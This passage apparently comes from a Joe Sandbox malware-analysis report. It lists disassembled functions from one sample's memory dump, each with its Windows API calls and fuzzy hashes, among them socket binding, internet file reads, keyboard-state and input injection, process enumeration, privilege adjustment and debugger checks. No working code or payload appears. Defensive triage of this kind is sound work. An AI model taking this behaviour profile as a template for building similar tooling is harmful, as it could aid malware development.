                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1972594611-438819550
                                                                                      • Opcode ID: 7df0a50f4a3a89fb4a58e9373511f989fa28205be31bb8fc925faa9581a8153e
                                                                                      • Instruction ID: 3ac44d4ff78999e4f74b1ea33c8873cadde8860617dcecc82b4f1edb507b8333
                                                                                      • Opcode Fuzzy Hash: 7df0a50f4a3a89fb4a58e9373511f989fa28205be31bb8fc925faa9581a8153e
                                                                                      • Instruction Fuzzy Hash: 4541717190020AAFDF15EFA4C885AFEBBB4EF46314F14415AE815A3191EB319F84DF64
                                                                                      Function 00C2997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C29A4E
                                                                                      • GetSysColor.USER32(0000000F), ref: 00C29B23
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00C29B36
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$LongProcWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3131106179-0
                                                                                      • Opcode ID: 95f9e1c0417b10cf0901eb4a7801236ec78a4380d3bffb4c27e412d5ef429c91
                                                                                      • Instruction ID: ff0996f53c95b79afa399f1ae77a3d5149b16e116aec00ae80e0c45a4e75c88b
                                                                                      • Opcode Fuzzy Hash: 95f9e1c0417b10cf0901eb4a7801236ec78a4380d3bffb4c27e412d5ef429c91
                                                                                      • Instruction Fuzzy Hash: F3A13770108564EEE739AA2DACC9E7F269DDF43308F150609F522DADA1CA35DE41E271
                                                                                      Function 00C91806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C9304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C9307A
                                                                                        • Part of subcall function 00C9304E: _wcslen.LIBCMT ref: 00C9309B
                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C9185D
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C91884
                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00C918DB
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C918E6
                                                                                      • closesocket.WSOCK32(00000000), ref: 00C91915
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                      • String ID:
                                                                                      • API String ID: 1601658205-0
                                                                                      • Opcode ID: 722c28c48615a5d6fe5660fd411ba61465aef6c286d4e14202123984ddc28ea1
                                                                                      • Instruction ID: 3d5584aac58c5453319ee5b3a5e6110b8948b8ee40130347cc91b7d1dfcb5fe0
                                                                                      • Opcode Fuzzy Hash: 722c28c48615a5d6fe5660fd411ba61465aef6c286d4e14202123984ddc28ea1
                                                                                      • Instruction Fuzzy Hash: D651B371A00210AFDB10AF24D88AF6A77E5AB45718F188098F9159F3D3D771ED41EBA1
                                                                                      Function 00CA1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                      • String ID:
                                                                                      • API String ID: 292994002-0
                                                                                      • Opcode ID: 965189be93c78b4bcd2a5cc7af28b0b3097fe1e03be2cecd9f80c05680f928d7
                                                                                      • Instruction ID: 52459e67f90c1292a1c9c0ce949a117be2bbf1a752b3bc49b672a58e89a346f3
                                                                                      • Opcode Fuzzy Hash: 965189be93c78b4bcd2a5cc7af28b0b3097fe1e03be2cecd9f80c05680f928d7
                                                                                      • Instruction Fuzzy Hash: 66219F317406125FD7218F2AC884B6A7BE5EF8632CF1D8068E8568B351CB71ED42DB94
                                                                                      Function 00C18060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                      • API String ID: 0-1546025612
                                                                                      • Opcode ID: 1a38536d152957bac10c73461c9699d211b5c5b5de7b6ec4b75f7ae0d24172de
                                                                                      • Instruction ID: fe406dc31e7628f22cc89dd2df615f0e82a2a9415cb22bdb497157a3d48a6544
                                                                                      • Opcode Fuzzy Hash: 1a38536d152957bac10c73461c9699d211b5c5b5de7b6ec4b75f7ae0d24172de
                                                                                      • Instruction Fuzzy Hash: 41A2AE74E0461ACBDF24CF58C8507EEB7B1BB55311F6481A9EC25A7280EB309EC9DB94
                                                                                      Function 00C9A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00C9A6AC
                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00C9A6BA
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00C9A79C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C9A7AB
                                                                                        • Part of subcall function 00C2CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00C53303,?), ref: 00C2CE8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 1991900642-0
                                                                                      • Opcode ID: 8bde808e5fa1824645ccd3ab2320186f731746ef347c8706e1c638530ab1bf5a
                                                                                      • Instruction ID: 87d1226208ae7f8bd34dadf69b56f9e7adfb33f89a69ddd7400186edd0b8f14f
                                                                                      • Opcode Fuzzy Hash: 8bde808e5fa1824645ccd3ab2320186f731746ef347c8706e1c638530ab1bf5a
                                                                                      • Instruction Fuzzy Hash: 95517D71508300AFD710EF24D886AAFBBE8FF89754F00891DF595972A1EB30D945DB92
                                                                                      Function 00C7AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C7AAAC
                                                                                      • SetKeyboardState.USER32(00000080), ref: 00C7AAC8
                                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C7AB36
                                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C7AB88
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                      • String ID:
                                                                                      • API String ID: 432972143-0
                                                                                      • Opcode ID: 02f17f708fb345e748fc4d95405730061295b07a539c662b5f0ee1eb2e912122
                                                                                      • Instruction ID: f2b0867b383ab15e6023c237aa8df25e781761fb8164e487c19ef1caeb707cf3
                                                                                      • Opcode Fuzzy Hash: 02f17f708fb345e748fc4d95405730061295b07a539c662b5f0ee1eb2e912122
                                                                                      • Instruction Fuzzy Hash: 0C311870A40208AFFF35CA65CC05BFE7BA6EBC5310F04C21AF199561D1D3749A85D7A2
                                                                                      Function 00C8CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00C8CE89
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00C8CEEA
                                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00C8CEFE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                                      • String ID:
                                                                                      • API String ID: 234945975-0
                                                                                      • Opcode ID: 23610c7ac831c0e3ba280ac5e41b62580356e9fd803e50357c981c966e46277d
                                                                                      • Instruction ID: f72ce9c5a990b5995e92bf70b9c9cc8d674e1a75c593d77ff1f933ee7c3f7191
                                                                                      • Opcode Fuzzy Hash: 23610c7ac831c0e3ba280ac5e41b62580356e9fd803e50357c981c966e46277d
                                                                                      • Instruction Fuzzy Hash: 5321BD71500305ABEB30EFA5C988BAAB7F8EB50318F10441EE656D2151EB74EE049B68
                                                                                      Function 00C7DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,00C55222), ref: 00C7DBCE
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00C7DBDD
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C7DBEE
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C7DBFA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2695905019-0
                                                                                      • Opcode ID: 09936a12f3b828499f5ad5561e9a90abf904e6ea74b02d1446beaba855f16bad
                                                                                      • Instruction ID: e0794c964b10a23d153e378ba6399be198a66a8eee4deb213e2b266c6d930c75
                                                                                      • Opcode Fuzzy Hash: 09936a12f3b828499f5ad5561e9a90abf904e6ea74b02d1446beaba855f16bad
                                                                                      • Instruction Fuzzy Hash: 43F0A9308109106783216B78AC4DAAE37BC9F02338F108702F83BC20F0EBB09E948696
                                                                                      Function 00C78298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C782AA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen
                                                                                      • String ID: ($|
                                                                                      • API String ID: 1659193697-1631851259
                                                                                      • Opcode ID: 6336f9ab3d8444130277ae4fc2262ee1fe76a6a4a4700f598d3514d2a2894a7e
                                                                                      • Instruction ID: ae9bd85e39902a8ff3419827db06c5350606f1c3d08549a44b5cd1cf9f165d30
                                                                                      • Opcode Fuzzy Hash: 6336f9ab3d8444130277ae4fc2262ee1fe76a6a4a4700f598d3514d2a2894a7e
                                                                                      • Instruction Fuzzy Hash: C9323674A007059FCB28CF69C085A6AB7F0FF48710B15C56EE5AADB7A1EB70E941CB50
                                                                                      Function 00C85C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C85CC1
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C85D17
                                                                                      • FindClose.KERNEL32(?), ref: 00C85D5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 3541575487-0
                                                                                      • Opcode ID: 75d505219ced884733e017673710441ff6e21b58a59d4b9cb28e333c3f0094e3
                                                                                      • Instruction ID: 31bfc3ddfbca2101ed57623dd027a17c45aa67d015f4031f2540ef8a09a4aa63
                                                                                      • Opcode Fuzzy Hash: 75d505219ced884733e017673710441ff6e21b58a59d4b9cb28e333c3f0094e3
                                                                                      • Instruction Fuzzy Hash: 27519974604A019FC714EF28C494A9AB7E4FF4A318F14855EE96A8B3A2CB70ED45CF91
                                                                                      Function 00C42622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00C4271A
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C42724
                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00C42731
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 3906539128-0
                                                                                      • Opcode ID: b2a2e7f47e5e7b916f240b3926fbcc8c6ab46d69a26f538d0bff18c11d64a6b9
                                                                                      • Instruction ID: 8c30f725d9dec06c0dd91ae06de8547ee204fd7c8bfb8ed0fc42230bda738134
                                                                                      • Opcode Fuzzy Hash: b2a2e7f47e5e7b916f240b3926fbcc8c6ab46d69a26f538d0bff18c11d64a6b9
                                                                                      • Instruction Fuzzy Hash: E531A27591121CABCB21DF68D9897DDBBB8BF08310F5041EAE81CA7261E7709F819F45
                                                                                      Function 00C851CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C851DA
                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C85238
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00C852A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                      • String ID:
                                                                                      • API String ID: 1682464887-0
                                                                                      • Opcode ID: cd57ff228f3b2430ba7b32fc8d2e35d163823a9a3ef9feef6c51dd38eee506aa
                                                                                      • Instruction ID: 61caebde287bb17ff8940858f865fa32334aa1ca2f121f1d68023dcc5453e6e0
                                                                                      • Opcode Fuzzy Hash: cd57ff228f3b2430ba7b32fc8d2e35d163823a9a3ef9feef6c51dd38eee506aa
                                                                                      • Instruction Fuzzy Hash: BC312B75A005189FDB00EF94D8C4FADBBB5FF49318F048099E905AB3A2DB71E956CB90
                                                                                      Function 00C716C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C2FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00C30668
                                                                                        • Part of subcall function 00C2FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00C30685
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7170D
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C7173A
                                                                                      • GetLastError.KERNEL32 ref: 00C7174A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                      • String ID:
                                                                                      • API String ID: 577356006-0
                                                                                      • Opcode ID: b1aebc82c77fbeec29345821733e92431267869ddd0f1523c3156b684f75b376
                                                                                      • Instruction ID: 95afc9644fc49420901adc2015bfe554fce427b6e08aecd6252694bed578d075
                                                                                      • Opcode Fuzzy Hash: b1aebc82c77fbeec29345821733e92431267869ddd0f1523c3156b684f75b376
                                                                                      • Instruction Fuzzy Hash: 2E1191B2414308AFD7189F54ECC6E6AB7BDEB44714B24C52EF45657641EB70BC428A20
                                                                                      Function 00C7D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C7D608
                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00C7D645
                                                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C7D650
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 33631002-0
                                                                                      • Opcode ID: c7855c093ac968e1313c3222559917f35219d161852a5147b9f8f63ebaa309cf
                                                                                      • Instruction ID: eed8662c7cf55e8935ce41db6e9080b8e44a9254a1029fd949942f90c9a45d6f
                                                                                      • Opcode Fuzzy Hash: c7855c093ac968e1313c3222559917f35219d161852a5147b9f8f63ebaa309cf
                                                                                      • Instruction Fuzzy Hash: F6115E75E05228BFDB108F95DC85FAFBBBCEB45B60F108515F918E7290D6704A058BA1
                                                                                      Function 00C71663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C7168C
                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C716A1
                                                                                      • FreeSid.ADVAPI32(?), ref: 00C716B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
